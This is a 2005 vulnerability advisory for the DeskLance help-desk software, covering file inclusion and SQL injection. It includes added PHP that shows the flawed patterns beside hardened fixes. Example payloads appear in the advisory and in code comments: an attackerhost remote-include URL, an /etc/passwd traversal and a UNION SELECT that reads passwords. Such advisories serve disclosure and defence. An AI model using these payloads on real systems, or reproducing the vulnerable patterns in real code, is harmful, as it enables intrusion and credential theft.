DeskLance Vuln.

2005-11-24T00:00:00
ID SECURITYVULNS:DOC:10348
Type securityvulns
Reporter Securityvulns
Modified 2005-11-24T00:00:00

Description

DeskLance Vuln.
Vuln. discovered by: r0t
Date: 24 Nov. 2005
Original advisory: http://pridels.blogspot.com/2005/11/desklance-vuln.html
Vendor: http://www.desklance.com/
Affected version: 2.3 and prior

Vuln. description: Input passed to the "main" parameter in "index.php" isn't properly verified before it is used to include files. This can be exploited to include arbitrary files from external and local resources (remote and local file inclusion). Example: /support/index.php?main=http://attackerhost/file
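The following is an added illustration, not DeskLance's own code: the include pattern the advisory describes, followed by an allowlist-based replacement. The variable name, the page names and the directory layout are assumptions; the advisory only states that "main" reaches an include call. On PHP of that era a remote URL in an include was fetched whenever allow_url_fopen was on; PHP 5.2 later added the separate allow_url_include setting, off by default, but a local path such as ../../../etc/passwd or a previously uploaded file is still includable regardless of that setting, so the fix has to be in the application.

```php
<?php
// Added example, not DeskLance code. Names and paths are assumptions.

// --- Vulnerable pattern (what the advisory describes) ---
// index.php?main=http://attackerhost/file  -> remote code is fetched and executed
// index.php?main=../../../../etc/passwd    -> local file is read into the response
function vulnerable_include(string $main): void
{
    include $main;
}

// --- Hardened replacement ---
// The request only selects a key; the filesystem path comes from a fixed map.
// Unknown keys fall back to a default page instead of being echoed or used.
const PAGES = [
    'home'    => 'pages/home.php',
    'tickets' => 'pages/tickets.php',
    'faq'     => 'pages/faq.php',
];

function resolve_page(?string $main): string
{
    // Strict array lookup: "home/../../etc/passwd" is simply not a key.
    if ($main !== null && array_key_exists($main, PAGES)) {
        return PAGES[$main];
    }
    return PAGES['home'];
}

function safe_include(?string $main): void
{
    include __DIR__ . '/' . resolve_page($main);
}

// Usage inside index.php:
safe_include($_GET['main'] ?? null);
```

Filtering the value with basename() or stripping "http://" is not enough: it leaves local inclusion and encoding tricks open. Mapping a short key to a hard-coded path, as above, means no attacker-controlled string ever reaches include.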

Also, the "announce" variable isn't properly sanitised before being used in a SQL query. It discloses the application's full installation path to the attacker and can be exploited by injecting arbitrary SQL code.
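As an added illustration (not DeskLance's code), here is the query pattern the advisory describes next to a parameterised replacement. The table and column names (announcements, id, title, body) and the use of mysqli are assumptions; the advisory only names the "announce" parameter. The comment on path disclosure is also an assumption about the mechanism: the common way an injection point leaks the full path is a database error message printed with display_errors on, which is why the hardened version logs errors instead of displaying them.

```php
<?php
// Added example, not DeskLance code. Table/column names are assumptions.

// --- Vulnerable pattern (what the advisory describes) ---
// announce=1'            -> SQL syntax error; with display_errors on, the error
//                           text typically includes the script's full path
// announce=1' UNION SELECT user,password FROM users-- -
//                        -> attacker reads other tables in the same response
function vulnerable_query(mysqli $db, string $announce)
{
    $sql = "SELECT title, body FROM announcements WHERE id = '" . $announce . "'";
    return $db->query($sql);
}

// --- Hardened replacement ---
// 1. Validate the shape of the input (an announcement id is a positive integer).
// 2. Bind it as a parameter so the database never parses it as SQL.
// 3. Log failures server-side; never echo the driver's error message.
function safe_query(mysqli $db, string $announce): ?array
{
    if (!ctype_digit($announce)) {
        return null;                       // reject anything that is not digits
    }
    $id = (int) $announce;

    $stmt = $db->prepare('SELECT title, body FROM announcements WHERE id = ?');
    if ($stmt === false) {
        error_log('announce lookup prepare failed: ' . $db->error);
        return null;
    }
    $stmt->bind_param('i', $id);
    if (!$stmt->execute()) {
        error_log('announce lookup failed: ' . $stmt->error);
        return null;
    }
    $row = $stmt->get_result()->fetch_assoc();
    return $row === null ? null : $row;
}

// Usage inside index.php (assumes $db is an open mysqli connection):
// $announcement = safe_query($db, $_GET['announce'] ?? '');
```

Escaping with mysql_real_escape_string() would close the injection but not the path disclosure; binding the value and suppressing error output addresses both points the advisory raises.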

Solution: Edit the source code to ensure that input is properly validated: accept only a fixed set of page names for the "main" parameter rather than a path, and use parameterised queries (or at minimum proper escaping) for the "announce" parameter, with database errors logged rather than displayed.